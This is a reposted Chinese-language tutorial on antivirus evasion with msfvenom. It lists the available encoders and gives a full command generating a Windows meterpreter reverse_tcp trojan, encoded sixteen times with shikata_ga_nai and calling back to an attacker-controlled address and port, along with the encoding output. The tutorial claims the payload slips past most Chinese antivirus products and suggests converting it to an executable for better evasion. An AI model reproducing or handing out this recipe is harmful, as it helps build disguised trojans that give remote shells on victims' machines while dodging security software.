Msfvenom编码免杀技术实现免杀实战
生活随笔
收集整理的這篇文章主要介紹了
Msfvenom编码免杀技术实现免杀实战
小編覺得挺不錯的,現(xiàn)在分享給大家,幫大家做個參考.
Msfvenom編碼免殺技術(shù)免殺實戰(zhàn)
免殺技術(shù)在網(wǎng)絡(luò)滲透的實戰(zhàn)中十分實用,本文將介紹使用msfvenom自帶編碼免殺工具進行編碼免殺,從而實現(xiàn)繞過殺毒軟件獲得shell的具體方法。
按照文中所講述的方法制作的木馬載荷可以繞開國內(nèi)所使用的大多數(shù)殺毒軟件,包括但不限于火絨,騰訊,百度,金山,virustotal沙箱查殺率12,簡單但實用
首先查看 msfveonom中可用的免殺編碼器。
msf6 > msfvenom --list encoders運行結(jié)果:
Framework Encoders [--encoder <value>] ======================================Name Rank Description---- ---- -----------cmd/brace low Bash Brace Expansion Command Encodercmd/echo good Echo Command Encodercmd/generic_sh manual Generic Shell Variable Substitution Command Encodercmd/ifs low Bourne ${IFS} Substitution Command Encodercmd/perl normal Perl Command Encodercmd/powershell_base64 excellent Powershell Base64 Command Encodercmd/printf_php_mq manual printf(1) via PHP magic_quotes UtilityCommand Encodergeneric/eicar manual The EICAR Encodergeneric/none normal The "none" Encodermipsbe/byte_xori normal Byte XORi Encodermipsbe/longxor normal XOR Encodermipsle/byte_xori normal Byte XORi Encodermipsle/longxor normal XOR Encoderphp/base64 great PHP Base64 Encoderppc/longxor normal PPC LongXOR Encoderppc/longxor_tag normal PPC LongXOR Encoderruby/base64 great Ruby Base64 Encodersparc/longxor_tag normal SPARC DWORD XOR Encoderx64/xor normal XOR Encoderx64/xor_context normal Hostname-based Context Keyed Payload Encoderx64/xor_dynamic normal Dynamic key XOR Encoderx64/zutto_dekiru manual Zutto Dekirux86/add_sub manual Add/Sub Encoderx86/alpha_mixed low Alpha2 Alphanumeric Mixedcase Encoderx86/alpha_upper low Alpha2 Alphanumeric Uppercase Encoderx86/avoid_underscore_to manual Avoid underscore/tolowerlowerx86/avoid_utf8_tolower manual Avoid UTF8/tolowerx86/bloxor manual BloXor - A Metamorphic Block Based XOREncoderx86/bmp_polyglot manual BMP Polyglotx86/call4_dword_xor normal Call+4 Dword XOR Encoderx86/context_cpuid manual CPUID-based Context Keyed Payload Encoderx86/context_stat manual stat(2)-based Context Keyed Payload Encoderx86/context_time manual time(2)-based Context Keyed Payload Encoderx86/countdown normal Single-byte XOR Countdown Encoderx86/fnstenv_mov normal Variable-length Fnstenv/mov Dword XOREncoderx86/jmp_call_additive normal Jump/Call XOR Additive Feedback Encoderx86/nonalpha low Non-Alpha Encoderx86/nonupper low Non-Upper Encoderx86/opt_sub manual Sub Encoder (optimised)x86/service manual Register Servicex86/shikata_ga_nai excellent Polymorphic XOR Additive Feedback Encoderx86/single_static_bit manual Single Static Bitx86/unicode_mixed manual Alpha2 Alphanumeric Unicode MixedcaseEncoderx86/unicode_upper manual Alpha2 Alphanumeric Unicode UppercaseEncoderx86/xor_dynamic normal Dynamic key XOR Encoder列表展示了所有可用的編碼器,此處選用x86/shikata_ga_nai舉例
以下是msfvenom的可用參數(shù):
運行如下命令:
msf6 > msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 16 LHOST=192.168.0.103 LPORT=4444 -f raw X > /Users/shikapy.py運行結(jié)果:
Found 1 compatible encoders Attempting to encode payload with 16 iterations of x86/shikata_ga_nai x86/shikata_ga_nai succeeded with size 381 (iteration=0) x86/shikata_ga_nai succeeded with size 408 (iteration=1) x86/shikata_ga_nai succeeded with size 435 (iteration=2) x86/shikata_ga_nai succeeded with size 462 (iteration=3) x86/shikata_ga_nai succeeded with size 489 (iteration=4) x86/shikata_ga_nai succeeded with size 516 (iteration=5) x86/shikata_ga_nai succeeded with size 543 (iteration=6) x86/shikata_ga_nai succeeded with size 570 (iteration=7) x86/shikata_ga_nai succeeded with size 597 (iteration=8) x86/shikata_ga_nai succeeded with size 624 (iteration=9) x86/shikata_ga_nai succeeded with size 651 (iteration=10) x86/shikata_ga_nai succeeded with size 678 (iteration=11) x86/shikata_ga_nai succeeded with size 705 (iteration=12) x86/shikata_ga_nai succeeded with size 732 (iteration=13) x86/shikata_ga_nai succeeded with size 759 (iteration=14) x86/shikata_ga_nai succeeded with size 786 (iteration=15) x86/shikata_ga_nai chosen with final size 786 Payload size: 786 bytes此時已經(jīng)生成了位于/Users目錄下的shikapy.py的木馬載荷文件
亦可使用模版文件或使用py2exe工具轉(zhuǎn)換成exe提高免殺效果,本文不再贅述
附:VT查殺圖
總結(jié)
以上是生活随笔為你收集整理的Msfvenom编码免杀技术实现免杀实战的全部內(nèi)容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 网络踩点
- 下一篇: html5页面打不开原因,部分网页打不开